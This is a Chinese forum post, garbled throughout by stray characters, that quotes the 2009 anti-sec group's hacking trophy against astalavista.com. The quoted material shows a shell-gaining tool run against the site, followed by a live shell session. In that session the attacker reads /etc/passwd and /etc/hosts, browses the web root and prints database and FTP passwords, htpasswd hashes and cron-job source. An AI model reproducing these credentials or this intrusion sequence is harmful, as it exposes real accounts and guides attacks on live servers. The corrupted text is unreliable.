里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。* h q* N9 Y; X* ?( t
: {$ |4 P$ k' q7 o
[root@front3 ~]# curl -I litespeedtech.com
7 ~+ E1 p8 ^7 }' `" U2 PHTTP/1.1 200 OK# |" E( H& b2 e9 y
Date: Fri, 05 Jun 2009 22:54:51 GMT* D. s. I Q- d [+ }, N: u
Server: LiteSpeed( C2 k1 _6 f) d! \1 v$ s( r" a
+ W! E! e: F# n1 l- ]0 X& q另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-$ e1 \2 G" t3 P5 C1 o5 B
' t% f7 N" `/ C' b/ A3 I& L有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。; S8 K* { ?/ V$ {& Q3 r' w1 Z
5 T ~: Y" w {( n
' B2 r1 w+ E' |. I4 h% f
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 7 ^% Z" H8 K, N/ ]: u" e( y
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
. y4 k2 {0 ~! v3 i# [: i/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \7 J: P. b( L8 H8 R1 S
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
8 W; U0 e9 g6 t4 j% m! d \/ \/ \/ \/ \/ \/ \/
& E4 V, w2 r( m/ Y The Hacking & Security Community
3 l5 a4 m2 T& R" W. p1 Y: q[+] Founded in 1997 by a hacker computer enthusiast, c( v8 O* l9 R8 ^0 B+ q
[-] Exposed in 2009 by anti-sec group
" |( t! I7 x4 B5 u6 E" p I( C% ~3 ?* ?1 L" ^& v2 q* S+ G# s, [
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
# ~: g& U; V8 N$ R8 E; `* p2 Y>> 03. Who’s behind the site?
( [4 K6 B0 Q" c$ Z>>
: D( V+ Y0 u$ n1 c7 I3 v; S8 c$ w8 ^>> A team of security and IT professionals, and a countless number of contributors from all over the world.
, G. ~. H, H' E8 y- Q# }! u/ o8 q- Z$ W
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
! g A8 j, a& A. ?- ]>>
5 }: x0 Q) y9 a7 I2 Q1 d. h>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and- K& R1 g% Z9 m7 ~7 F- _: v
military institutions.
) v8 Q. w/ k7 X, a" y+ L7 `>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.4 ^9 t# w) O6 B ]+ D
- }, P( F, p# _7 f0 O; w
Why has Astalavista been targeted?% e% t6 ]! D4 t4 J% g
6 f; l6 t$ @; H/ U6 AOther than the fact that they are not doing any of this for the “community” but
( _2 T. V3 `- X. P+ @' s. ^9 Lfor the money, they spread exploits for kids, claim to be a security community
! b0 l2 V# R! v(with no real sense of security on their own servers), and they charge you $6.66
# j% t3 C0 K) P/ w. u9 N9 d: D9 Bper months to access a dead forum with a directory filled with public releases, I( m C8 b6 G0 e# W: L- M" }
and outdated / broken services.
8 @$ s1 z" z, h" w' C. F
/ M; w. E' E; H( K4 S/ P! [% TWe wanted to see how good that “team of security and IT professionals” really is.8 N% R. g% t. D% Z' ~2 n; w# s
* B- G0 p% |- t4 X7 SLet’s begin.
7 b; g0 Z/ I1 `2 c) N0 T
7 p3 r! e2 ?& U! R, C" g7 @0 w, \anti-sec:~# ./g0tshell astalavista.com -p 80" X5 a, [! r3 ^, L& v( u. e# N" W3 ?
[+] Connecting to astalavista.com:80
$ m H* m! ?$ v6 F" O. d& ~[+] Grabbing banner…
) l- j5 L6 B& u1 j) C7 gLiteSpeed4 s; k, S# g$ k$ s
[+] Injecting shellcode…! r% R( R0 H4 \/ p2 _( E" x4 ~( D
[-] Wait for it" z+ Y' T2 Z P9 {( W1 l
" d: f: Z8 l. E$ I4 B2 {, l& f! X[~] We g0tshell
* |$ x8 J1 d* q8 k$ O; I4 b. buname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
8 \8 G7 s0 U j4 a# fID: uid=100(apache) gid=500(apache) groups=500(apache)
3 k" G \, y9 `+ p; n5 f K, _' C* h7 R% K/ a$ E
sh-3.2$ cat /etc/passwd
( n9 f; [: O8 s( A G; s& E7 `root:x:0:0:root:/root:/bin/bash& d8 }6 I# i5 L* \
bin:x:1:1:bin:/bin:/sbin/nologin
" p5 y9 T# Z8 k, k' p5 R/ ~daemon:x:2:2:daemon:/sbin:/sbin/nologin- X1 X' b- x, S& u3 _+ ?
adm:x:3:4:adm:/var/adm:/sbin/nologin% V; l9 \# y m, B% C
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin5 l0 s/ }, G2 t( S1 `
sync:x:5:0:sync:/sbin:/bin/sync
5 x) i* J0 o2 n9 o; Q/ M/ l/ N" ^shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
% F+ V, g' Z! r. {8 y. |2 l4 j2 Uhalt:x:7:0:halt:/sbin:/sbin/halt8 Q/ ~. N/ h8 d& X
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin8 }4 [9 J! _* i) G# u& ?2 U6 b. u
news:x:9:13:news:/etc/news:
; O1 l0 P0 @: d, U9 Juucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin7 D1 y! ~1 p$ i( g. T* R
operator:x:11:0 perator:/root:/sbin/nologin
V$ l6 Y4 D$ F8 x J; X- ~games:x:12:100:games:/usr/games:/sbin/nologin
% R1 E- E _5 N) Z& U- Agopher:x:13:30:gopher:/var/gopher:/sbin/nologin0 m( h( }2 K+ y. h- @% y3 B1 Y
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin ~: v$ ]2 J( X) [8 `& z
nobody:x:99:99:Nobody:/:/sbin/nologin
5 c' W' }6 c, @( c& h Wrpm:x:37:37::/var/lib/rpm:/sbin/nologin1 F/ I3 q! `% A
dbus:x:81:81:System message bus:/:/sbin/nologin
- n$ s) X$ s" ]* i6 A) `nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
0 P* P E9 W' b4 @8 g8 ]mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
( y) w+ t' E# _# Q; `9 Psmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin7 x) `0 w/ k" [, k% i- q9 ]) Q- t
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin/ u3 [4 _" @% I4 p
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
: p% s) o% I8 J& J7 |rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
) k" Q/ J& e; K8 h" E1 Mrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
: D; e+ O6 @0 L6 v5 \nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- O: I4 ^8 `5 ~, W u8 asshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin+ r Y# a# K& B' T, Q/ h
pcap:x:77:77::/var/arpwatch:/sbin/nologin
, H0 v. E1 r3 W, _7 K; K0 wnamed:x:25:25:Named:/var/named:/sbin/nologin
( e) b- K. Q/ ?! ^3 {5 \3 [* R6 v) eapache:x:100:500::/var/www:/bin/false4 T/ y7 ?5 B* Z, y* v% f0 l
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
6 \) `1 u+ Y8 n/ I. c* ~mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
; K$ P. w/ p: ?/ N& w0 Vwebapps:x:500:501::/var/www/html:/bin/bash0 j) o: C; N2 @# g2 ~) ^
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
, l3 {; r- C9 M# n, a5 f% F' @admin:x:501:502::/home/admin:/bin/bash
0 }; ]$ D% c! r8 W! V& r; v/ w, {; Yjon:x:502:503::/home/jon:/bin/bash- C" r- k7 ^) |8 d' A
com:x:503:504::/home/com:/bin/bash
4 y4 V8 [! K; ^# u: t0 b/ Dntp:x:38:38::/etc/ntp:/sbin/nologin
4 U* P: Y+ N1 e( [2 Eais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin8 S' @; H# ?& C* k% |0 [* m
astanet:x:504:505::/home/astanet:/bin/bash
- G. N$ z7 Q4 B* P( h$ @. eavahi:x:70:70:Avahi daemon:/:/sbin/nologin
' f, H, X: }6 E) o1 V: Pavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
" A- M- Z1 I4 L. F* i. C( N- P! e0 {' z$ w- n/ S A; D2 U$ W
sh-3.2$ cat /etc/hosts& u. V8 h. i% s8 q, C* t0 b3 X
# Do not remove the following line, or various programs# Z, n7 Y! B" \; k0 y
# that require network functionality will fail.' S( l: W& a) `: q* Q% ?
127.0.0.1 localhost.localdomain localhost- N* F3 u- J! S9 p/ d) c
::1 localhost6.localdomain6 localhost6
8 ^% _6 W6 H- t5 O" {1 w* r80.74.154.172 asta1.astalavistaserver.com
( U5 I O* o% j2 G. j L" E4 f2 d4 l8 M- m
sh-3.2$ pwd
* I+ C z/ J0 ]- t: N0 Z/home/com/public_html
$ a: @0 H) _" \$ y
" ~" h: B1 C# \& _ t- v1 Osh-3.2$ ls -la0 }0 X5 s0 i, I7 H2 Y0 J
total 18460
# A a* S& h7 ]' e, x) r: Pdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
' E5 J/ d% d0 }; R( D- N8 Zdrwx–x–x 11 com com 4096 Jun 25 2008 ../ \; S$ [4 x) j. D6 y- i( n W
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin8 }: t+ {: ]8 D8 e3 E& y7 x
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
5 I. f+ [9 u- O7 @: Vdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin3 m' x* z L* C" f; O. l0 ]
drwxrwxrwx 2 com com 4096 May 19 00:50 config
8 }- e5 {0 m, B, V& V( z! Idrwxr-xr-x 2 com com 4096 Mar 20 11:05 core% C# V; B9 a) l
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
* y: `8 o1 w5 Sdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing" H& ?3 y3 N' b( [; @
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
2 T8 Z$ J7 y( x% P0 n$ `6 G' |drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
' i6 |1 }8 B9 Q1 q( Z+ K-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php% T; R1 m* T3 j" f; D7 }' A
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd5 a. i. w& t1 h( k4 L5 B" G
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
/ w" C( d z# E# I- L-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico W }& c3 f+ S9 G0 o) u
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed4 H1 @: s4 o. I2 b
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess: e3 \6 I5 R/ {8 a: @( \
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
. |) c- D( ?% B1 Z# Z-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
/ ]( s0 }* z2 v1 m7 S9 udrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
& V* P; H3 a2 ^) o6 \0 b E. idrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
7 \1 Y" o% t7 ~( Z/ S3 N1 F" `-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
: {; m+ N7 E' t+ Odrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
8 [5 y q/ ?( C- L5 sdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang9 b2 _% q3 v7 ? T7 y3 g$ Y2 z$ ~6 `. p
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib* c* `+ x, n- q
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media# h: @& R' z) ~% M
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications w7 X) S' U6 b+ u
drwxr-xr-x 34 com com 4096 May 28 16:30 modules2 @2 L) e: V5 k* x( x
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
' ?% U& q8 S+ X4 a& Ydrwxrwxr-x 22 com com 4096 May 28 17:06 _new
8 e' T0 U$ v" B& sdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old1 o- v) |7 n3 q# w, d6 H; y1 [; _
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy- x% y7 I D. k& {* i) t0 ?. L
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy/ C, `! w% M$ e8 J& Q% _* r
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt* {# u0 f6 i$ l2 U( C8 g
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml& r* f# Y2 ^0 }4 a% W8 r) E0 a
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php, h0 o( p5 B, }1 t/ l
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes Q8 h8 Z# Q4 a# M3 n
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp( P2 V) R0 O5 {- C9 H; K
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam) S9 P3 [( C: g1 y- {& j6 [- ^
$ T( w. }, d; G# e% w6 B
sh-3.2$ head -20 index.php _+ D5 z6 F5 m' R' v' }
<?php
) N8 U; b4 s3 P" R+ o* u9 z- ~. p3 ?2 M6 o( I
/**5 r$ S$ x L1 ^. A% t- Q" B
* The main page for the CMS
* j+ B$ H9 T7 g/ c, a8 J* @copyright CONTREXX CMS - COMVATION AG0 t. [, @0 S* L8 Z, y% M
* @author Comvation Development Team
# Z& a& ]1 e2 M* @version v1.0.9.10.1 stable
* ~ x$ O- B+ b! h% F$ F* @package contrexx
6 {# B' b" f$ m2 f/ j* @subpackage core+ \' b6 O$ V$ O6 P9 I9 {" I
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
3 k. r- ^( r/ f* @since v0.0.0.05 x7 X& o8 t: [: h" _/ d4 o6 M
* @todo Capitalize all class names in project
' V% s; M+ x& f7 N+ [$ T* @uses /config/configuration.php* d+ E8 D2 y# E6 b2 F ?
* @uses /config/settings.php
7 K' {& J% s" Z/ `* @uses /config/version.php
[; P# z4 Q+ K. Q) K* @uses /core/API.php
) U. h% w0 c- e- y- n+ C; Z# B* @uses /core_modules/cache/index.class.php
9 y) L n( u% R* @uses /core/error.class.php
) [6 l, d' R$ R* c& y# H* @uses /core_modules/banner/index.class.php" L; \$ s4 I2 C3 i, m
* @uses /core_modules/contact/index.class.php
/ ~/ h3 G, T) G/ S( w% e' R+ T1 I' c; M( z% C% [# G+ Q, {4 @$ ?/ h$ h
sh-3.2$ cd config/4 D2 a! r C/ ~/ A; J
sh-3.2$ ls -la$ z0 n% {5 @$ t) U
total 32& t6 c! o& X7 N7 U7 l/ @4 v) T6 @
drwxrwxrwx 2 com com 4096 May 19 00:50 .
) `+ L0 u4 @" \) q& p$ {5 [drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
& C; G; U) D7 q. ~-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php) M; i0 V) u3 n9 A4 a8 G
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php5 v) B+ [* A9 u
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php' i& ?! G: t0 T; j5 ~) s; h3 t
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php( X" v; Q; }* F- y# p3 d
+ @1 h' d, L, f! V+ T% g x* csh-3.2$ cat configuration.php
3 Z( \/ ?9 X* o[snip]5 |# z$ e8 o% d0 z% ?6 E8 a9 V4 h6 e
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
; c; B7 A. F) J$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
( A% Y2 _: p$ g" L3 q: Q$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
0 A' {' Q- R* r. h1 E- D+ J$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username J" m" W/ K- h0 l9 f R
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password n! u# k5 v( O2 L( W o
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..) A5 s/ K9 Y9 x; c
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)4 l1 X* M- x: T2 A1 {
[snip]
4 e6 k5 z/ C6 k7 c$_FTPCONFIG['is_activated'] = true; // Ftp support true or false5 b, u9 {, |2 }
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode1 \4 @: \8 \) j$ a; @' }% l- Y
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
, G. i8 a1 `/ s( Q: }0 y: e/ Y$_FTPCONFIG['port'] = 21; // Ftp remote port
1 Q. F2 }- X8 n5 |/ R$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username: u' \5 U' {! x8 T1 @' D
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
" r$ a) A9 C( W8 R" x& _& m$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
3 E3 n6 t# u# ^2 r L+ _' R+ b
1 h& A% V+ x4 Fsh-3.2$ cd ..; V _. T& R5 G4 _; g
sh-3.2$ cd dvd/' l& Z \+ o! t0 \' c1 M
sh-3.2$ ls -la
+ }& N2 k0 y. g$ x. p* L* D6 Dtotal 2913780
# ^% G& o: Y9 n: Tdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
8 h) r* E$ y0 U+ u, E! Udrwxr-xr-x 30 com apache 4096 May 28 17:06 ..3 a2 ~4 b: d- `( q0 Z0 n
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
& H+ V* @ g+ s% _0 T- |' l, ]; e-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
6 G' C- @$ n' o; Q. U-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar! E6 c% P: V7 I( r) f/ v
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
+ ~ ^ L3 B( o8 [1 _% `+ X, h, O8 ]# ]
sh-3.2$ cat .htaccess
4 p4 [! H" [8 W- IauthType Basic
u! W. I: v* a, t6 i' j+ H0 a* CauthName DVD3 C# u7 j7 D& h
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
! q2 @6 \7 d/ N( Orequire valid-user
% ~! K$ x/ x+ U/ `, x: s) w6 r/ s! ^# T9 N* i
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
5 x- f' k; Y3 |8 O# K2 jDVDdownload:CRD8cuY6.MPT6; U' o9 G! \1 V/ ? A( u# m3 f; k
DVDdownload2:CR8a36.wluFMg
* F4 Z' U/ o& Z1 d# B4 j: J( g8 K9 k# d
sh-3.2$ cat test.php
( ~$ u0 t. w) S$ p6 a: m<?php1 x3 y* R9 `6 M$ z. A) y/ m O
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;$ E; A, t; ^# \* q" \! F0 E) u
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));8 V, ^/ G; X/ b! h, b: C
echo $url;. p% l- z2 V: z& e
?>8 v" L! G! E4 k+ H* V( s9 }3 p$ p5 s& K
) ^6 s5 p3 W$ B1 S2 {' l. t9 h* a
sh-3.2$ cd modifications/
6 u" l0 k2 c% R" g9 Xsh-3.2$ ls -la
. |. q8 f( w2 Z5 y3 }1 Btotal 322 u, O7 A# m& p) A
drwxr-xr-x 8 com com 4096 May 11 12:48 .
9 V7 J- B D# l5 k( tdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..0 M. R/ U q* R0 h8 ], Q0 m# D
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
8 [' t. I5 j& }0 {8 Sdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs# W# h: y' G U" U6 [
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools% C# l; ?! P. l- n7 x+ A
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc3 u, H+ `% u' [
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search6 H3 y4 Y! V/ j( w/ f% r
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp, n. s, Q5 X; |6 f+ ?1 V! J
3 b; X! i: `# j5 Ksh-3.2$ ls -R
! S6 `+ i/ m0 H.:) }; x& S" n' F
com_avtng cronjobs onlinetools pjirc search _tmp( |9 v8 R5 C2 `; ^
' j$ R" o/ g* L+ Z6 _6 v. u
./com_avtng:6 U7 ^! _7 X* X" `) b3 i
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
1 C E. T# \, N' r6 d2 s
/ ~, ?% V2 W* K( {7 d* g7 n./com_avtng/scripts:* k4 v- Q' z E( ]; _9 r
popunder.js
3 |5 d8 H2 R7 [/ r
. x$ K* ~: t) w' |./cronjobs:
1 d: o9 Y/ ?0 \* h0 wexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
4 h; O7 }4 f- C: \7 m% } u
; m" D6 y7 T O0 N. W# P" U./cronjobs/tmp:
, o; O- h" ]8 X2 S6 Z2 qcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv: A' j/ J% M/ Y* G' }7 L
q: t% r+ S8 ^9 _+ d
./onlinetools:
! o; ?( @& F$ T& X& Tindex.php0 b: Y* l8 D. f' `
$ f" U1 Z. S3 ^
./pjirc:
0 p8 J& r6 u5 z7 u% T6 Y! sa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
& u- s7 q. k2 d# KAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt6 w( ~' W# `) z5 T3 B
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
' {# ~4 V2 B( `* M% C W5 M5 A6 c2 y3 p- z% N( ~& d
./pjirc/img:% Y7 s/ d# |* z6 a& a
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
6 _3 b9 N/ o7 }- M8 j# Q! tarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 7 q% z8 c. t7 S
verre-eau.gif( p# h$ b$ M w, c
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 0 y$ @- [& k8 `1 g* X
verre-vin.gif
2 W. K% u- S1 B+ bballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif0 W. j1 M: _* |( J1 A) ?6 G2 E% @
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif7 t; g7 h# ]( p4 p
# K* b& M( N$ ^./pjirc/snd:
8 Z6 z0 S3 u! s5 T# i* E9 Zbell2.au ding.au
) g3 f: o7 o( F) e; `% f! Y
! B, W, r* U" D- L* `./search:0 D1 ^3 ~3 W) T" e- j
searchEngines.php search.php
e% g( v+ m9 Y8 _; c( u- {9 q; n8 R
./_tmp:- O, d/ t L& `9 _+ P
defaultPorts.php defaultPorts.txt
$ o; {$ {% A% H/ R* g7 e3 T5 v2 n1 _% K3 V+ D
sh-3.2$ cd cronjobs/
) C$ Y+ o, ?& ? _9 t/ rsh-3.2$ cat exploits.php+ p5 f3 x9 T: g0 d" t& t
[snip]
2 o. ^' V$ z/ l& w1 x$categories = array();
* S0 Y! U6 v i) x1 e5 a$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;' g- j) j3 a% t" C
$expolits = file($milw0rmFile);
: Q$ z. y5 n7 |. s( S$comExploits = array();
2 H' u. w) V* Q9 l% u[snip], B# L( C/ T( X; |: \0 I
// manage data
: [$ }6 D4 q: e I( ?: @for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
7 `- L1 e" i+ I8 p
+ K* q& ~3 D' k1 I // get path and title
2 C2 q, Y) p3 P; |6 d4 U f $expolits[$x] = trim($expolits[$x]);
$ s8 k+ L! x5 j4 G $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
% b7 o2 k- X( D' _! T$ O1 T $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
. k+ [3 d4 ?: |) Q3 L+ @
( e( W! T! G/ v# B4 Y: n/ L // check if file exists7 e8 S; W6 o* r$ ?' y9 V# e. {0 Q
if (file_exists($path)) {4 t6 s% O7 c4 a0 g" Y
4 \$ I4 a4 ~ M: E) |! p! P+ f6 [
$text = file_get_contents($path);, I! q( j0 @! j. M8 B' o
$ L% v- n6 a/ I% z8 H7 v8 ] // get content and date
- W5 Q9 a! @. G( q: w //$text = htmlspecialchars($text, ENT_QUOTES);& e4 v6 c/ b' n- K, c
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));: B( d6 i- S) H& d
if ($tmptext != ”) {
; Y" b! l1 w+ R- _* L# e $text = $tmptext;+ m7 @0 ]: v+ A
} else {" V# i. F& m6 g( Z% y8 m2 K1 G
$text = addslashes(htmlentities($text, ENT_QUOTES));
9 S x: q/ {# w7 y9 Q }+ T* A8 `* a' A( q. ]6 U
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));$ ~1 E( F# Y+ b$ f
$tmp = explode('-', $date);
$ u) _* Z- Q6 f# |5 e# ] $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));5 ]+ w( v; S6 z6 z3 h! |
$cat = getCategory ($path);# o# j# M% Z. m3 C2 p
$ext = pathinfo(basename($path));6 j7 l O* v1 G0 G+ V' @" R
$ext = $ext['extension'];
q" c; p7 y* V, X0 T $qStr = ”$ J; z0 u) X" N! T
SELECT `id`
/ _' h `/ H2 z- s* h FROM `contrexx_module_exploits`
, M4 y6 A# H) q& X+ M. T" K4 G WHERE `title` = ‘” . $title . “‘
) [$ p0 L( { R AND `date` = ‘” . $date . “‘
+ Q. G E) u4 \# k; ]$ i “;
8 v& Z6 c B3 l0 B echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
+ u0 M/ o. {) {+ v- l9 \/ w $q = $_objDB->query($qStr);
3 N0 q% c; G" x' R* z9 k; E1 ^# B2 M+ Y( E' J# ?* ]0 ~! ]
if ($q->numRows() == 0) {) i/ X: c: z' _
) v- u, D& j$ \+ M // prepare array0 \2 ~: }1 j4 a" s9 c8 e/ Z
$comExploits[$x]['date'] = $date;
9 `( p4 [. \" ^: W5 P+ b. J! l: M $comExploits[$x]['title'] = $title;
( x; F3 F9 u; \( C F $comExploits[$x]['author'] = ‘milw0rm’;
! G8 h4 }; G8 O% \% F1 i $comExploits[$x]['text'] = $text;
9 U+ k' P( `+ \ $comExploits[$x]['source'] = $ext;6 [! E1 T8 `- G& c. _3 a
$comExploits[$x]['url1'] = ”;0 w% A+ a/ O' k' M3 l
$comExploits[$x]['url2'] = ”;
8 s; l9 [6 e. x- j! l! B7 q: t $comExploits[$x]['catid'] = $cat;$ t; e1 H- R5 c2 m
$comExploits[$x]['lang'] = ‘2′;6 H) t6 V9 G) u
$comExploits[$x]['userid'] = ‘12′;
- Z6 h+ s" S1 [ $comExploits[$x]['startdate'] = ‘0000-00-00′;0 ^7 y; s3 L A- N! @% X ]
$comExploits[$x]['enddate'] = ‘0000-00-00′;1 ^& N# |2 ~- R
$comExploits[$x]['status'] = ‘1′;
( S/ _& k) ?: w" r! m $comExploits[$x]['changelog'] = $date;
d: w8 l, s! ?9 C. c/ [4 c& }( O
0 v1 u) e6 J4 G& O( _4 n }
s- ^9 @' L( j& R; T( M( ~! ?[snip]: |% v8 _! M+ B% Z
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
; a- I; i6 O j Z( [' U<rss version=”2.0″>
8 e/ N" j* L: h" C& Z <channel>
' F/ c2 `) B( u: h3 [ <title>ASTALAVISTA.com - Exploits</title>
2 q/ h1 X$ o B" R4 m. s <link>http://www.astalavista.com/exploits</link>
